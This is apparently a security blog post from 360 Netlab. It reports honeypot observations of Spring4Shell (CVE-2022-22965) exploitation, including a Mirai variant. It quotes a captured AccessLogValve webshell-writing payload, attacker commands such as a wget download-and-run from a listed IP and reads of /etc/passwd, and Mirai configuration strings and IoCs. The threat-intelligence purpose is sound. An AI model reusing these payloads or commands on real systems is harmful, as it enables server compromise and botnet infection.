1/19 houliuyang April 1, 2022 What Our Honeypot Sees Just One Day After The Spring4Shell Advisory blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/ 1 April 2022 / honeypot Background On March 31, 2022, Spring issued a security advisory[1] for the Spring4Shell vulnerability (CVE-2022-22965), this vulnerability has caused widespread concern in the security community. When we looked back at our data, our threat hunting honeypot System[2] had already captured activities related to this exact vulnerability. After March 30, we started to see more attempts such as various webshells, and today, 2022-04-01 11:33:09(GMT+8), less than one day after the vendor released the advisory, a variant of Mirai, has won the race as the first botnet that adopted this vulnerability. Spring4Shell in the wild propagation Our honeypot system started to observe scans related to the Spring4Shell vulnerability (CVE-2022-22965), the following diagram shows the geographic distribution of the scanner IP addresses that we have seen so far. https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/ https://blog.netlab.360.com/tag/honeypot/ https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement https://netlab.360.com/honeypot 2/19 Top 10 country statistics United States 92 The Netherlands 49 Germany 30 China 21 France 6 Luxembourg 6 Sweden 6 Switzerland 5 Ukraine 5 Austria 4 https://blog.netlab.360.com/content/images/2022/04/spring4shell_scanner_distribution.png 3/19 We haven seen a large number of Webshell and test file upload behavior, the corresponding file information is shown below. Some of the exploits that we have observed so far: https://blog.netlab.360.com/content/images/2022/04/webshell.png 4/19 echo%20ddfdsfasdfasd echo%20fdsafasdfasd echo%202222222 ls ls%20/tmp/ whoami %2Fbin%2Fsh%2F- c%24%7BIFS%7D%27cd%24%7BIFS%7D%2Ftmp%3Bwget%24%7BIFS%7Dhttp%3A%2F%2F107.174.133.167%2F O-%A6sh%24%7BIFS%7DSpringCore%3B%27 cat+/etc/passwd chdir cmd /c dir cmd /c net user curl+http://111.4vcrkb.dnslog.cn/1.jpg curl+http://12121.4vcrkb.dnslog.cn/1.jpg curl+http://35456.4vcrkb.dnslog.cn/1.jpg dir echo echo 8888888888 echo %USERNAME% echo %computername% echo echo fucker_test_test echo rinima echo%20%3Csvg%20onload=confirm`xss`%3E echo%20%3Csvg%20onload=confirm`xsssssss`%3E echo%20ddfdsfasdfasd echo%20fdsafasdfasd echo%202222222 echo+22222 echo+`whoami` echo+whoami exp id ifconfig ls ls%20/tmp/ ping -n 2 uup0fk.dnslog.cn ping uup0fk.dnslog.cn uname whoami whoami%0A Spring4Shell Vulnerability brief Spring4Shell vulnerability (CVE-2022-22965) is caused by the new module feature in JDK version 9 and above, and is a bypass for the CVE-2010-1622 vulnerability patch. Java Beans Java introspection manipulates JavaBean properties through reflection, the JDK provides the PropertyDescription class operation to access JavaBean properties, when operating on multiple properties, you can operate on all properties by traversing the property description 5/19 object array. Through the class Introspector to get the BeanInfo information of an object, and then the BeanInfo to get the property descriptor PropertyDescriptor, the property descriptor can get the getter/setter methods corresponding to a property, and then through the reflection mechanism to call these methods. For example, through the PropertyDescriptor[] assignment. If the parent class properties is not needed, the second parameter of getBeanInfo Class beanClass, Class stopClass) is there, calling BeanInfo getBeanInfo(Class beanClass) directly, PropertyDescriptor[] will contain the parent class Object.class. CVE-2010-1622 Vulnerability brief CVE-2010-1622 vulnerability exists because "CachedIntrospectionResults class"of Spring Beans does not specify the stop class when calling java.beans.Introspector.getBeanInfo() enumeration property assignment, resulting in the parent class ( Object.class is the parent class of any java object) class property can be maliciously controlled by an attacker. Spring parameter supports the user to submit a form in the form of parameters = value object assignment, while user.address.street = Disclosure + Str is equivalent to frmObj.getUser().getAddress().setStreet("Disclosure Str."). So a value can be assigned to the first class property in PropertyDescriptor[] by means of user.address.street=Disclosure+Str. If the class property is controlled through the classLoader, the exploit chain can be constructed. Vulnerability Patch Spring patches the vulnerability by adding the classLoader to the property array blacklist. CVE-2022-22965 Vulnerability brief https://blog.netlab.360.com/content/images/2022/04/patch.png 6/19 Similar to the CVE-2010-1622 vulnerability, another class parameter related issue. CVE-2022-22965 is a bypass of patch CVE-2010-1622, in JDK11+Tomcat8.5.77+spring- webmvc5.3.17 version, we noticed that class.module.classLoader.* can load ParallelWebappClassLoader to bypass the detection of classLoader: Exploit Payload that we saw class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di% 1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D- 1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.cl Here the pattern specifies the format of the log record, suffix specifies the log record suffix as .jsp, directory specifies the directory webapps/ROOT where the log is saved, prefix specifies the file name tomcatwar, fileDateFormat specifies the date format of the log file name. The whole payload uses Tomcat’s class AbstractAccessLogValve to modify the log storage format, directory and file name, so the webshell can be uploaded. https://blog.netlab.360.com/content/images/2022/04/class.png https://blog.netlab.360.com/content/images/2022/04/classloader.png 7/19 Vulnerability Patch A strict blacklist restrictions have been added Mirai botnet As mentioned above, Mirai botnet has jumped on the wagon and the following is the relevant configuration information that has been decrypted. https://blog.netlab.360.com/content/images/2022/04/patch1.png 8/19 [0x01]: "46.175.146.159\x00", size=15 [0x02]: "A\x84", size=2 [0x03]: "D\xfd", size=2 [0x04]: "U better back the fuck off CIANigger >>>---<3-->\x00", size=49 [0x05]: "shell\x00", size=6 [0x06]: "enable\x00", size=7 [0x07]: "system\x00", size=7 [0x08]: "sh\x00", size=3 [0x09]: "/bin/busybox DEMONS\x00", size=20 [0x0a]: "DEMONS: applet not found\x00", size=25 [0x0b]: "ncorrect\x00", size=9 [0x0c]: "/bin/busybox ps\x00", size=16 [0x0d]: "assword\x00", size=8 [0x0e]: "ogin\x00", size=5 [0x0f]: "enter\x00", size=6 [0x10]: "/proc/\x00", size=7 [0x11]: "/exe\x00", size=5 [0x12]: "/fd\x00", size=4 [0x13]: "/maps\x00", size=6 [0x14]: "/proc/net/tcp\x00", size=14 [0x15]: "/etc/resolv.conf\x00", size=17 [0x16]: "nameserver\x00", size=11 [0x17]: "Pully\x13SHD\x1aiIGK\x1cDig\x13\x18}Bfpc]MkGp^b\x12[}P\x1b\\~m`b`^rc\x13Xeg\x13G\x1a\ size=57 [0x18]: "i586\x00", size=5 [0x19]: "i486\x00", size=5 [0x1a]: "x86\x00", size=4 [0x1b]: "i686\x00", size=5 [0x1c]: "mips\x00", size=5 [0x1d]: "mipsel\x00", size=7 [0x1e]: "mpsl\x00", size=5 [0x1f]: "sh4\x00", size=4 [0x20]: "superh\x00", size=7 [0x21]: "ppc\x00", size=4 [0x22]: "powerpc\x00", size=8 [0x23]: "spc\x00", size=4 [0x24]: "sparc\x00", size=6 [0x25]: "(deleted)\x00", size=10 [0x26]: "abcdefghijklmnopqrstuvwxyz\x00", size=27 [0x27]: "%d.%d.%d.%d\x00", size=12 [0x28]: "POST /cdn-cgi/\x00", size=15 [0x29]: "UPX!\x00", size=5 [0x2a]: "botnet\x00", size=7 [0x2b]: "ddos\x00", size=5 [0x2c]: "oginenterassword\x00", size=17 [0x2d]: "GET/ HTTP/1.1\x00", size=15 [0x2e]: "garm\x00", size=5 [0x2f]: "gx86\x00", size=5 [0x30]: "gmips\x00", size=6 [0x31]: "gmpsl\x00", size=6 [0x32]: "gsh4\x00", size=5 [0x33]: "gspc\x00", size=5 [0x34]: "gppc\x00", size=5 [0x35]: "gsec\x00", size=5 9/19 [0x36]: ".glm\x00", size=5 [0x37]: "cronx86\x00", size=8 [0x38]: "cronarm\x00", size=8 [0x39]: "cronmips\x00", size=9 [0x3a]: "cronmpsl\x00", size=9 [0x3b]: "cronsh4\x00", size=8 [0x3c]: "cronspc\x00", size=8 [0x3d]: "cronppc\x00", size=8 [0x3e]: "cronsh\x00", size=7 [0x3f]: "gi686\x00", size=6 [0x40]: "/dev/watchdog\x00", size=14 [0x41]: "/dev/misc/watchdog\x00", size=19 [0x42]: "/dev/FTWDT101_watchdog\x00", size=23 [0x43]: "/dev/FTWDT101 watchdog\x00\x12", size=24 [0x44]: "/dev/watchdog0\x00", size=15 [0x45]: "/etc/default/watchdog\x00", size=22 [0x46]: "/sbin/watchdog\x00", size=15 Some Webshell and test files that we have seen so far filepath count /tmp/log222.txt 3973 webapps/ROOT/log111.txt 2051 webapps/ROOT/tomcatwar.jsp 110 webapps/ROOT/wpz.jsp 27 /../webapps/ROOT/logout.jsp 12 ./webapps/ROOT/test2%20%20.txt 9 webapps/ROOT/log101.txt 7 /log_data_9.jsp 3 webapps/ROOT/xiaozhan.jsp 3 webapps/ROOT/1122.jsp 3 webapps/ROOT/0985763860781234.jsp 3 /2023.jsp 3 webapps/ROOT/zhuzhuxias.jsp 3 webapps/ROOT/log147.txt 2 webapps/ROOT/aaa69875.jsp 1 webapps/ROOT/log186.txt 1 10/19 filepath count webapps/ROOT/aaa36917.jsp 1 webapps/ROOT/member3war.jsp 1 webapps/ROOT/aaa96225.jsp 1 webapps/ROOT/log154.txt 1 webapps/ROOT/log103.txt 1 webapps/ROOT/log176.txt 1 webapps/ROOT/7FMNZ.jsp 1 webapps/ROOT/aaa28643.jsp 1 webapps/ROOT/aaa49231.jsp 1 webapps/ROOT/aaa50586.jsp 1 webapps/ROOT/log112.txt 1 webapps/ROOT/log110.txt 1 webapps/ROOT/aaa80751.jsp 1 /2021.jsp 1 webapps/ROOT/aaa10854.jsp 1 webapps/ROOT/log105.txt 1 webapps/ROOT/aaa93089.jsp 1 webapps/ROOT/35456.jsp 1 webapps/ROOT/log182.txt 1 webapps/ROOT/aaa24348.jsp 1 webapps/ROOT/log131.txt 1 webapps/ROOT/indexbk.jsp 1 webapps/ROOT/log149.txt 1 webapps/ROOT/log179.txt 1 webapps/webappsbak/sxxd1648765386.txt 1 11/19 filepath count webapps/ROOT/log150.txt 1 Webapps/ROOT/78754.jsp 1 webapps/ROOT/aaa24168.jsp 1 webapps/ROOT/aaa10487.jsp 1 webapps/ROOT/log178.txt 1 webapps/ROOT/lapsus 1 webapps/ROOT/zhuzhuxia.jsp 1 webapps/ROOT/log135.txt 1 webapps/ROOT/aaa40373.jsp 1 webapps/ROOT/qweasd.jsp 1 webapps/ROOT/console.jsp 1 webapps/ROOT/aaa79694.jsp 1 webapps/ROOT/aaa54378.jsp 1 webapps/ROOT/log129.txt 1 webapps/ROOT/pCJrI.jsp 1 webapps/ROOT/log162.txt 1 Webapps/ROOT/7875456457.jsp 1 webapps/ROOT/.jsp 1 webapps/ROOT/log200.txt 1 webapps/ROOT/8888888888.jsp 1 webapps/ROOT/8888888888.txt 1 webapps/ROOT/log128.txt 1 webapps/ROOT/log124.txt 1 webapps/ROOT/aaa14058.jsp 1 webapps/ROOT/aaa94175.jsp 1 12/19 filepath count webapps/ROOT/conf.jsp 1 webapps/stupidRumor_war/tomcatwar.jsp 1 webapps/ROOT/aaa83816.jsp 1 Recommendations Spring users should follow the vendor’s advisory, as the same time, users can check their systems for the aforementioned Webshell and test files paths for possible breach. Contact us Readers are always welcomed to reach us on twitter or email us at netlab at 360 dot cn . IoC List Mirai C2 46.175.146.159:16772 IP https://twitter.com/360Netlab 13/19 1.85.220.54 China AS4134 CHINANET- BACKBONE 3.239.1.141 United States AS14618 AMAZON-AES 5.2.69.50 The Netherlands AS60404 Liteserver 14.0.170.249 China AS38819 HKCSL-AS-AP 23.128.248.10 United States AS398355 DATAIDEAS-LLC 23.128.248.11 United States AS398355 DATAIDEAS-LLC 23.128.248.12 United States AS398355 DATAIDEAS-LLC 23.128.248.13 United States AS398355 DATAIDEAS-LLC 23.128.248.14 United States AS398355 DATAIDEAS-LLC 23.128.248.15 United States AS398355 DATAIDEAS-LLC 23.128.248.16 United States AS398355 DATAIDEAS-LLC 23.128.248.17 United States AS398355 DATAIDEAS-LLC 23.128.248.19 United States AS398355 DATAIDEAS-LLC 23.128.248.20 United States AS398355 DATAIDEAS-LLC 23.128.248.21 United States AS398355 DATAIDEAS-LLC 23.128.248.22 United States AS398355 DATAIDEAS-LLC 23.128.248.23 United States AS398355 DATAIDEAS-LLC 23.128.248.24 United States AS398355 DATAIDEAS-LLC 23.128.248.25 United States AS398355 DATAIDEAS-LLC 23.128.248.27 United States AS398355 DATAIDEAS-LLC 23.128.248.28 United States AS398355 DATAIDEAS-LLC 23.128.248.29 United States AS398355 DATAIDEAS-LLC 23.128.248.33 United States AS398355 DATAIDEAS-LLC 23.128.248.34 United States AS398355 DATAIDEAS-LLC 23.128.248.38 United States AS398355 DATAIDEAS-LLC 23.128.248.39 United States AS398355 DATAIDEAS-LLC 23.128.248.40 United States AS398355 DATAIDEAS-LLC 23.128.248.41 United States AS398355 DATAIDEAS-LLC 23.128.248.42 United States AS398355 DATAIDEAS-LLC 23.128.248.43 United States AS398355 DATAIDEAS-LLC 23.128.248.44 United States AS398355 DATAIDEAS-LLC 23.128.248.46 United States AS398355 DATAIDEAS-LLC 23.128.248.48 United States AS398355 DATAIDEAS-LLC 23.128.248.50 United States AS398355 DATAIDEAS-LLC 23.128.248.51 United States AS398355 DATAIDEAS-LLC 23.128.248.53 United States AS398355 DATAIDEAS-LLC 23.128.248.54 United States AS398355 DATAIDEAS-LLC 23.128.248.55 United States AS398355 DATAIDEAS-LLC 23.128.248.56 United States AS398355 DATAIDEAS-LLC 23.128.248.57 United States AS398355 DATAIDEAS-LLC 23.128.248.58 United States AS398355 DATAIDEAS-LLC 23.128.248.59 United States AS398355 DATAIDEAS-LLC 23.128.248.60 United States AS398355 DATAIDEAS-LLC 23.128.248.61 United States AS398355 DATAIDEAS-LLC 23.128.248.62 United States AS398355 DATAIDEAS-LLC 23.128.248.63 United States AS398355 DATAIDEAS-LLC 23.128.248.64 United States AS398355 DATAIDEAS-LLC 23.128.248.65 United States AS398355 DATAIDEAS-LLC 23.129.64.130 United States AS396507 EMERALD-ONION 23.129.64.131 United States AS396507 EMERALD-ONION 23.129.64.132 United States AS396507 EMERALD-ONION 23.129.64.133 United States AS396507 EMERALD-ONION 23.129.64.134 United States AS396507 EMERALD-ONION 23.129.64.135 United States AS396507 EMERALD-ONION 14/19 23.129.64.136 United States AS396507 EMERALD-ONION 23.129.64.137 United States AS396507 EMERALD-ONION 23.129.64.138 United States AS396507 EMERALD-ONION 23.129.64.139 United States AS396507 EMERALD-ONION 23.129.64.140 United States AS396507 EMERALD-ONION 23.129.64.141 United States AS396507 EMERALD-ONION 23.129.64.142 United States AS396507 EMERALD-ONION 23.129.64.143 United States AS396507 EMERALD-ONION 23.129.64.145 United States AS396507 EMERALD-ONION 23.129.64.146 United States AS396507 EMERALD-ONION 23.129.64.147 United States AS396507 EMERALD-ONION 23.129.64.148 United States AS396507 EMERALD-ONION 23.129.64.149 United States AS396507 EMERALD-ONION 23.129.64.210 United States AS396507 EMERALD-ONION 23.129.64.211 United States AS396507 EMERALD-ONION 23.129.64.212 United States AS396507 EMERALD-ONION 23.129.64.213 United States AS396507 EMERALD-ONION 23.129.64.214 United States AS396507 EMERALD-ONION 23.129.64.215 United States AS396507 EMERALD-ONION 23.129.64.216 United States AS396507 EMERALD-ONION 23.129.64.217 United States AS396507 EMERALD-ONION 23.129.64.218 United States AS396507 EMERALD-ONION 23.129.64.219 United States AS396507 EMERALD-ONION 23.129.64.250 United States AS396507 EMERALD-ONION 23.154.177.6 United States AS399532 ULAYER-ASN 23.154.177.7 United States AS399532 ULAYER-ASN 23.239.21.195 United States AS63949 LINODE-AP 27.102.106.117 South Korea AS45996 GNJ-AS-KR 37.187.18.212 France AS16276 OVH 37.187.96.183 France AS16276 OVH 43.128.201.239 Thailand AS132203 TENCENT-NET- AP-CN 43.242.116.54 India AS45916 GTPL-AS-AP 45.15.16.105 Sweden AS42675 OBEHOSTING 45.32.251.86 Japan AS20473 AS-CHOOPA 45.33.101.246 United States AS63949 LINODE-AP 45.61.186.160 United States AS53667 PONYNET 45.78.48.51 Japan AS25820 IT7NET 45.128.133.242 Belgium AS206804 EstNOC-GLOBAL 45.129.56.200 Denmark AS39351 ESAB-AS 45.136.15.239 China AS139659 LUCID-AS-AP 45.153.160.2 The Netherlands AS212906 moneroj-ca 45.153.160.132 The Netherlands AS212906 moneroj-ca 45.153.160.136 The Netherlands AS212906 moneroj-ca 45.154.255.138 Sweden AS41281 KEFF 45.154.255.139 Sweden AS41281 KEFF 45.154.255.147 Sweden AS41281 KEFF 46.166.139.111 The Netherlands AS43350 NFORCE 46.175.146.159 The Netherlands AS50673 Serverius-as 46.232.251.191 Germany AS197540 netcup-AS 51.15.76.60 The Netherlands AS12876 AS12876 51.77.52.216 Poland AS16276 OVH 58.82.211.226 China AS137872 PEOPLESPHONE- HK 58.240.81.135 China AS4837 CHINA169- 15/19 Backbone 60.248.106.229 China AS3462 HINET 62.102.148.68 Sweden AS51815 TEKNIKBYRAN 62.102.148.69 Sweden AS51815 TEKNIKBYRAN 64.113.32.29 United States AS15154 SBBSNET 66.220.242.222 United States AS17356 VERMONT-TELE 74.82.47.194 United States AS6939 HURRICANE 81.17.18.59 Switzerland AS51852 PLI-AS 81.17.18.62 Switzerland AS51852 PLI-AS 85.93.218.204 Luxembourg AS9008 ASN-VO 85.204.116.204 Romania AS48874 HOSTMAZE 87.120.37.231 Bulgaria AS34224 NETERRA-AS 89.58.27.84 Germany AS197540 netcup GmbH 89.163.131.159 Germany AS24961 MYLOC-AS 89.163.131.160 Germany AS24961 MYLOC-AS 91.132.147.168 Germany AS197540 netcup-AS 91.149.225.172 Norway AS58110 IPVOLUME 91.211.89.43 Ukraine AS206638 hostfory 91.211.89.107 Ukraine AS206638 hostfory 91.211.89.207 Ukraine AS206638 hostfory 91.250.242.12 Romania AS6718 NAV 92.246.84.133 Germany AS44592 SkyLink 93.95.226.212 Iceland AS44925 THE-1984-AS 93.174.89.132 The Netherlands AS202425 INT-NETWORK 93.179.115.27 United States AS25820 IT7NET 94.140.114.210 Latvia AS43513 NANO-AS 101.37.159.147 China AS37963 CNNIC- ALIBABA-CN-NET-AP 103.27.108.196 China AS132883 TOPWAY-AS-AP 103.42.196.135 India AS138754 KVBPL-AS-IN 103.42.196.203 India AS138754 KVBPL-AS-IN 103.108.193.24 China AS139021 WEST263GO-HK 103.140.186.68 Singapore AS206804 EstNOC-GLOBAL 103.140.186.72 Singapore AS206804 EstNOC-GLOBAL 103.140.186.73 Singapore AS206804 EstNOC-GLOBAL 103.214.146.5 China AS135330 ADCDATACOM- AS-AP 103.253.41.98 China AS133398 TELE-AS 104.244.72.115 Luxembourg AS53667 PONYNET 104.244.76.13 Luxembourg AS53667 PONYNET 104.244.76.44 Luxembourg AS53667 PONYNET 104.244.76.170 Luxembourg AS53667 PONYNET 104.244.77.101 Luxembourg AS53667 PONYNET 107.189.5.249 Luxembourg AS53667 PONYNET 109.70.100.19 Austria AS208323 APPLIEDPRIVACY-AS 109.70.100.31 Austria AS208323 APPLIEDPRIVACY-AS 109.70.100.82 Austria AS208323 APPLIEDPRIVACY-AS 109.70.100.84 Austria AS208323 APPLIEDPRIVACY-AS 109.201.133.100 The Netherlands AS43350 NFORCE 111.252.183.41 China AS3462 HINET 111.252.198.28 China AS3462 HINET 16/19 112.5.154.7 China AS9808 CMNET-GD 112.36.205.252 China AS24444 CMNET- V4shandong-AS-AP 112.169.175.24 South Korea AS131477 SHHJ-AS 119.86.148.176 China AS4134 CHINANET- BACKBONE 124.222.23.106 China AS45090 CNNIC- TENCENT-NET-AP 128.31.0.13 United States AS3 MIT-GATEWAYS 141.164.43.95 South Korea AS20473 AS-CHOOPA 142.4.206.84 Canada AS16276 OVH 143.198.131.158 United States AS14061 DIGITALOCEAN- ASN 144.172.73.66 United States AS212513 STELZL-AS 144.202.116.138 United States AS20473 AS-CHOOPA 144.217.86.109 Canada AS16276 OVH 146.19.174.33 China AS147293 NEAROUTE-AS- AP 146.59.233.33 France AS16276 OVH 151.80.148.159 France AS16276 OVH 159.223.73.101 Singapore AS14061 DIGITALOCEAN- ASN 162.247.74.7 United States AS4224 CALYX-AS 164.92.65.110 United States AS14061 DIGITALOCEAN- ASN 164.132.9.199 France AS16276 OVH 166.70.207.2 United States AS6315 XMISSION 167.71.238.228 India AS14061 DIGITALOCEAN- ASN 167.99.76.46 Singapore AS14061 DIGITALOCEAN- ASN 168.62.22.238 United States AS8075 MICROSOFT- CORP-MSN-AS-BLOCK 171.25.193.20 Germany AS198093 DFRI-AS 171.25.193.25 Germany AS198093 DFRI-AS 171.25.193.77 Germany AS198093 DFRI-AS 171.25.193.78 Germany AS198093 DFRI-AS 172.104.93.152 Japan AS63949 LINODE-AP 172.104.140.107 Germany AS63949 LINODE-AP 172.104.159.48 Germany AS63949 LINODE-AP 172.107.241.110 United States AS40676 AS40676 172.245.89.109 United States AS36352 AS- COLOCROSSING 175.178.154.77 China AS45090 CNNIC- TENCENT-NET-AP 178.17.170.135 Moldova AS43289 TRABIA 178.17.171.102 Moldova AS43289 TRABIA 178.17.174.14 Moldova AS43289 TRABIA 178.20.55.18 France AS29075 IELO 182.255.45.211 China AS6134 XNNET 185.34.33.2 France AS28855 OCTOPUCE-AS 185.36.81.95 Lithuania AS133398 TELE-AS 185.38.175.130 Denmark AS205235 LABITAT 185.38.175.131 Denmark AS205235 LABITAT 185.56.80.65 The Netherlands AS43350 NFORCE 17/19 185.82.126.13 Latvia AS52173 MAKONIX 185.83.214.69 Portugal AS58110 IPVOLUME 185.100.86.74 Finland AS200651 FlokiNET 185.100.86.128 Finland AS200651 FlokiNET 185.100.87.41 Romania AS200651 FlokiNET 185.100.87.133 Romania AS200651 FlokiNET 185.100.87.174 Romania AS200651 FlokiNET 185.100.87.202 Romania AS200651 FlokiNET 185.105.90.134 Russia AS205090 FIRST-SERVER- EUROPE 185.107.47.171 The Netherlands AS43350 NFORCE 185.107.47.215 The Netherlands AS43350 NFORCE 185.107.70.56 The Netherlands AS43350 NFORCE 185.112.147.12 Iceland AS44925 THE-1984-AS 185.129.62.62 Denmark AS57860 ZENCURITY-NET 185.163.119.0 Germany AS197540 netcup-AS 185.165.171.40 Romania AS200651 FlokiNET 185.165.171.84 Romania AS200651 FlokiNET 185.170.114.25 Germany AS197540 netcup-AS 185.174.101.214 United States AS8100 ASN- QUADRANET-GLOBAL 185.220.100.240 Germany AS205100 F3NETZE 185.220.100.241 Germany AS205100 F3NETZE 185.220.100.242 Germany AS205100 F3NETZE 185.220.100.243 Germany AS205100 F3NETZE 185.220.100.244 Germany AS205100 F3NETZE 185.220.100.245 Germany AS205100 F3NETZE 185.220.100.246 Germany AS205100 F3NETZE 185.220.100.247 Germany AS205100 F3NETZE 185.220.100.248 Germany AS205100 F3NETZE 185.220.100.249 Germany AS205100 F3NETZE 185.220.100.250 Germany AS205100 F3NETZE 185.220.100.251 Germany AS205100 F3NETZE 185.220.100.252 Germany AS205100 F3NETZE 185.220.100.253 Germany AS205100 F3NETZE 185.220.100.254 Germany AS205100 F3NETZE 185.220.100.255 Germany AS205100 F3NETZE 185.220.101.6 The Netherlands AS208294 RELAYON 185.220.101.22 The Netherlands AS208294 RELAYON 185.220.101.32 The Netherlands AS208294 RELAYON 185.220.101.33 The Netherlands AS208294 RELAYON 185.220.101.34 The Netherlands AS208294 RELAYON 185.220.101.35 The Netherlands AS208294 RELAYON 185.220.101.36 The Netherlands AS208294 RELAYON 185.220.101.37 The Netherlands AS208294 RELAYON 185.220.101.38 The Netherlands AS208294 RELAYON 185.220.101.39 The Netherlands AS208294 RELAYON 185.220.101.40 The Netherlands AS208294 RELAYON 185.220.101.41 The Netherlands AS208294 RELAYON 185.220.101.42 The Netherlands AS208294 RELAYON 185.220.101.43 The Netherlands AS208294 RELAYON 185.220.101.44 The Netherlands AS208294 RELAYON 185.220.101.45 The Netherlands AS208294 RELAYON 185.220.101.46 The Netherlands AS208294 RELAYON 185.220.101.47 The Netherlands AS208294 RELAYON 18/19 185.220.101.48 The Netherlands AS208294 RELAYON 185.220.101.49 The Netherlands AS208294 RELAYON 185.220.101.50 The Netherlands AS208294 RELAYON 185.220.101.51 The Netherlands AS208294 RELAYON 185.220.101.52 The Netherlands AS208294 RELAYON 185.220.101.53 The Netherlands AS208294 RELAYON 185.220.101.54 The Netherlands AS208294 RELAYON 185.220.101.55 The Netherlands AS208294 RELAYON 185.220.101.56 The Netherlands AS208294 RELAYON 185.220.101.57 The Netherlands AS208294 RELAYON 185.220.101.58 The Netherlands AS208294 RELAYON 185.220.101.59 The Netherlands AS208294 RELAYON 185.220.101.60 The Netherlands AS208294 RELAYON 185.220.101.61 The Netherlands AS208294 RELAYON 185.220.101.62 The Netherlands AS208294 RELAYON 185.220.101.63 The Netherlands AS208294 RELAYON 185.220.102.240 The Netherlands AS60729 ZWIEBELFREUNDE 185.220.102.245 The Netherlands AS60729 ZWIEBELFREUNDE 185.220.102.249 The Netherlands AS60729 ZWIEBELFREUNDE 185.220.102.254 The Netherlands AS60729 ZWIEBELFREUNDE 185.220.103.7 United States AS4224 CALYX-AS 185.226.67.169 Greece AS205053 Aweb-ASN 185.243.218.27 Norway AS56655 TERRAHOST 185.246.188.95 Belgium AS3164 ASTIMP-IT 185.247.226.98 Iceland AS200651 FlokiNET 185.254.75.32 Germany AS3214 XTOM 188.68.58.0 Germany AS197540 netcup-AS 192.42.116.23 The Netherlands AS1101 IP-EEND-AS 193.31.24.154 Germany AS197540 netcup-AS 193.110.95.34 Switzerland AS13030 INIT7 193.111.199.64 Germany AS24961 MYLOC-AS 193.218.118.95 Ukraine AS207656 EPINATURA 193.218.118.183 Ukraine AS207656 EPINATURA 193.218.118.231 Ukraine AS207656 EPINATURA 194.31.98.186 The Netherlands AS213035 AS-SERVERION 194.233.77.245 Singapore AS141995 CAPL-AS-AP 195.176.3.19 Switzerland AS559 SWITCH 195.176.3.23 Switzerland AS559 SWITCH 198.54.128.102 United States AS11878 TZULO 198.98.51.189 United States AS53667 PONYNET 198.98.57.207 United States AS53667 PONYNET 198.144.121.43 The Netherlands AS206264 AMARUTU- TECHNOLOGY 199.195.248.29 United States AS53667 PONYNET 199.195.254.81 United States AS53667 PONYNET 199.249.230.87 United States AS62744 QUINTEX 203.175.13.118 China AS141677 NATHOSTS-AS- AP 204.8.156.142 United States AS10961 BGP-AS 205.185.117.149 United States AS53667 PONYNET 205.185.124.178 United States AS53667 PONYNET 19/19 209.141.41.103 United States AS53667 PONYNET 209.141.44.64 United States AS53667 PONYNET 209.141.45.189 United States AS53667 PONYNET 209.141.46.81 United States AS53667 PONYNET 209.141.46.203 United States AS53667 PONYNET 209.141.54.195 United States AS53667 PONYNET 209.141.55.26 United States AS53667 PONYNET 209.141.57.178 United States AS53667 PONYNET 209.141.58.146 United States AS53667 PONYNET 209.141.60.19 United States AS53667 PONYNET 210.217.18.88 South Korea AS4766 KIXS-AS-KR 211.20.42.23 China AS3462 HINET 212.107.30.157 China AS41378 KirinoNET 213.61.215.54 Germany AS8220 COLT 213.164.204.146 Sweden AS8473 BAHNHOF 217.138.199.93 Czech Republic AS9009 M247 URL http://107.174.133.167/gmpsl http://107.174.133.167/gi686 http://107.174.133.167/garm http://107.174.133.167/gmips http://107.174.133.167/garm7 http://107.174.133.167/gx86 http://107.174.133.167/t.sh http://107.174.133.167/garm6 http://107.174.133.167/garm5 http://15.185.213.122:65123/javac http://15.185.213.122:65123 base64://be3f78b59fa14140b6cc8633bf705a75 http://15.185.213.122:65123/java base64://c08fec5682085417b0a039bdf47c38f2 MD5 4bcd19351697d04fb357ce5b36600207 7d244e7bf48d6631b588cecae87e759d 9c14d670a48bba4b7c047a01d417f8f2 97a7a357b8290a7236a5fbf45f17569f 7621f1a5e8db18f3ae30031122c9c397 100674f1e3ecfb6fa244de4ba7fd2ae2 329155ab45e244661a7725d81dfad740 611630a580e33017be32de8c72625489 650152a2fe78dfceceb4d1a1fdeaccb8 400590515f0f1cf942fe734126be94e7 a8a36132632366c7f65066b23d6f7e4f b1124c862998bc4ab3ff8b1d471310a6 cca63413e3ca6b834b6a4446768c5ccb dcc157b2c284ac676000d64dd33f3ec4 e1190f07a6da91caaa317affc9512caa eba95249cf0a51e300d7b6029cf7088e fb63e9a23dbf4124116471fcf3254283 fd839753ca4d89c0ccd229b12f95827c